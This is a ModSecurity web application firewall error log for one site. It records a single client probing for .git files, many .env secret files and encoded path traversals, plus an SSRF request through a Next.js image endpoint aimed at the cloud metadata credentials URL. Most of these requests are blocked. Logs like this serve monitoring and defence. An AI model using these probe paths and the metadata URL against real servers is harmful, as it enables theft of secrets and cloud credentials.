[Tue May 12 02:07:30.794909 2026] [security2:error] [pid 1730175:tid 1730183] [client 93.123.109.164:7372] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJvQno6NvB9WXx5V-5yTAAAAQY"]
[Tue May 12 02:07:31.637618 2026] [security2:error] [pid 1691274:tid 1691297] [client 93.123.109.164:7308] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQVfdQaraX_prmqcWQQAAABY"]
[Tue May 12 02:07:32.004054 2026] [security2:error] [pid 1730175:tid 1730198] [client 93.123.109.164:7338] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQno6NvB9WXx5V-5ySwAAARU"]
[Tue May 12 02:07:32.074765 2026] [security2:error] [pid 1730207:tid 1730215] [client 93.123.109.164:7356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQjue9Sp-pIv_Bb6GdgAAAUY"]
[Tue May 12 02:07:32.086811 2026] [security2:error] [pid 1709071:tid 1709105] [client 93.123.109.164:7450] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQrvMumyrWMfSu7qgqQAAANI"]
[Tue May 12 02:07:32.132358 2026] [security2:error] [pid 1707624:tid 1707696] [client 93.123.109.164:7326] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQrOxS7i6i_mT2NK_JQAAAE4"]
[Tue May 12 02:07:32.210037 2026] [core:error] [pid 1695975:tid 1695998] [client 93.123.109.164:7322] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 02:07:32.364269 2026] [security2:error] [pid 1730175:tid 1730193] [client 93.123.109.164:7368] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQno6NvB9WXx5V-5ySgAAARA"]
[Tue May 12 02:07:32.701581 2026] [security2:error] [pid 1730207:tid 1730224] [client 93.123.109.164:7354] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/config"] [unique_id "agJvRDue9Sp-pIv_Bb6GegAAAU8"]
[Tue May 12 02:07:32.701778 2026] [security2:error] [pid 1730207:tid 1730224] [client 93.123.109.164:7354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/config"] [unique_id "agJvRDue9Sp-pIv_Bb6GegAAAU8"]
[Tue May 12 02:07:32.717957 2026] [security2:error] [pid 1730175:tid 1730198] [client 93.123.109.164:7338] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "labaujue.com"] [uri "/_next/image"] [unique_id "agJvRHo6NvB9WXx5V-5yTgAAARU"]
[Tue May 12 02:07:32.718710 2026] [security2:error] [pid 1730175:tid 1730198] [client 93.123.109.164:7338] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/_next/image"] [unique_id "agJvRHo6NvB9WXx5V-5yTgAAARU"]
[Tue May 12 02:07:32.802278 2026] [security2:error] [pid 1709071:tid 1709088] [client 93.123.109.164:7396] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQrvMumyrWMfSu7qgqAAAAME"]
[Tue May 12 02:07:32.839413 2026] [security2:error] [pid 1691274:tid 1691286] [client 93.123.109.164:7362] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQlfdQaraX_prmqcWQwAAAAk"]
[Tue May 12 02:07:32.852224 2026] [security2:error] [pid 1691274:tid 1691279] [client 93.123.109.164:7460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQlfdQaraX_prmqcWRAAAAAI"]
[Tue May 12 02:07:32.873845 2026] [security2:error] [pid 1691274:tid 1691291] [client 93.123.109.164:7366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQlfdQaraX_prmqcWQgAAAA8"]
[Tue May 12 02:07:32.875560 2026] [security2:error] [pid 1695975:tid 1696000] [client 93.123.109.164:7420] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQtVI9ymHBxup74-EoAAAAJY"]
[Tue May 12 02:07:33.317714 2026] [security2:error] [pid 1730207:tid 1730225] [client 93.123.109.164:7434] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQjue9Sp-pIv_Bb6GdQAAAVA"]
[Tue May 12 02:07:33.912532 2026] [security2:error] [pid 1695975:tid 1695981] [client 93.123.109.164:7388] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/app/.env"] [unique_id "agJvRdVI9ymHBxup74-EpAAAAIM"]
[Tue May 12 02:07:33.913024 2026] [security2:error] [pid 1695975:tid 1695981] [client 93.123.109.164:7388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/app/.env"] [unique_id "agJvRdVI9ymHBxup74-EpAAAAIM"]
[Tue May 12 02:07:33.935676 2026] [security2:error] [pid 1707624:tid 1707695] [client 93.123.109.164:7370] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQrOxS7i6i_mT2NK_JgAAAE0"]
[Tue May 12 02:07:34.919013 2026] [security2:error] [pid 1691274:tid 1691279] [client 93.123.109.164:7460] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/backend/.env"] [unique_id "agJvRlfdQaraX_prmqcWSQAAAAI"]
[Tue May 12 02:07:34.919215 2026] [security2:error] [pid 1691274:tid 1691279] [client 93.123.109.164:7460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/backend/.env"] [unique_id "agJvRlfdQaraX_prmqcWSQAAAAI"]
[Tue May 12 02:07:34.929069 2026] [security2:error] [pid 1730207:tid 1730225] [client 93.123.109.164:7434] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/storage/.env"] [unique_id "agJvRjue9Sp-pIv_Bb6GfAAAAVA"]
[Tue May 12 02:07:34.929253 2026] [security2:error] [pid 1730207:tid 1730225] [client 93.123.109.164:7434] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/storage/.env"] [unique_id "agJvRjue9Sp-pIv_Bb6GfAAAAVA"]
[Tue May 12 02:07:34.917556 2026] [security2:error] [pid 1707624:tid 1707697] [client 93.123.109.164:7476] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/local/.env"] [unique_id "agJvRrOxS7i6i_mT2NK_KwAAAE8"]
[Tue May 12 02:07:34.939559 2026] [security2:error] [pid 1707624:tid 1707697] [client 93.123.109.164:7476] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/local/.env"] [unique_id "agJvRrOxS7i6i_mT2NK_KwAAAE8"]
[Tue May 12 02:07:35.036133 2026] [security2:error] [pid 1730175:tid 1730183] [client 93.123.109.164:7372] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvQno6NvB9WXx5V-5yTAAAAQY"]
[Tue May 12 02:07:35.713576 2026] [security2:error] [pid 1730207:tid 1730224] [client 93.123.109.164:7354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvRDue9Sp-pIv_Bb6GegAAAU8"]
[Tue May 12 02:07:36.234649 2026] [security2:error] [pid 1730175:tid 1730198] [client 93.123.109.164:7338] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvRHo6NvB9WXx5V-5yTgAAARU"]
[Tue May 12 02:07:37.414247 2026] [security2:error] [pid 1695975:tid 1695996] [client 93.123.109.164:7586] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.ENV"] [unique_id "agJvSdVI9ymHBxup74-EpgAAAJI"]
[Tue May 12 02:07:37.414449 2026] [security2:error] [pid 1695975:tid 1695996] [client 93.123.109.164:7586] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.ENV"] [unique_id "agJvSdVI9ymHBxup74-EpgAAAJI"]
[Tue May 12 02:07:37.576991 2026] [security2:error] [pid 1730207:tid 1730219] [client 93.123.109.164:7524] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env.production"] [unique_id "agJvSTue9Sp-pIv_Bb6GgAAAAUo"]
[Tue May 12 02:07:37.562585 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.164:7576] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env.bak"] [unique_id "agJvSTue9Sp-pIv_Bb6GfwAAAUA"]
[Tue May 12 02:07:37.580347 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.164:7576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env.bak"] [unique_id "agJvSTue9Sp-pIv_Bb6GfwAAAUA"]
[Tue May 12 02:07:37.581494 2026] [security2:error] [pid 1730175:tid 1730179] [client 93.123.109.164:7538] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env.development"] [unique_id "agJvSXo6NvB9WXx5V-5yUgAAAQI"]
[Tue May 12 02:07:37.581631 2026] [security2:error] [pid 1730175:tid 1730179] [client 93.123.109.164:7538] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env.development"] [unique_id "agJvSXo6NvB9WXx5V-5yUgAAAQI"]
[Tue May 12 02:07:37.590096 2026] [security2:error] [pid 1709071:tid 1709095] [client 93.123.109.164:7596] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%252f found within REQUEST_URI_RAW: /..%252f..%252f.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "labaujue.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJvSbvMumyrWMfSu7qgsAAAAMg"]
[Tue May 12 02:07:37.590421 2026] [security2:error] [pid 1709071:tid 1709095] [client 93.123.109.164:7596] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "labaujue.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJvSbvMumyrWMfSu7qgsAAAAMg"]
[Tue May 12 02:07:37.590623 2026] [security2:error] [pid 1709071:tid 1709095] [client 93.123.109.164:7596] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "labaujue.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJvSbvMumyrWMfSu7qgsAAAAMg"]
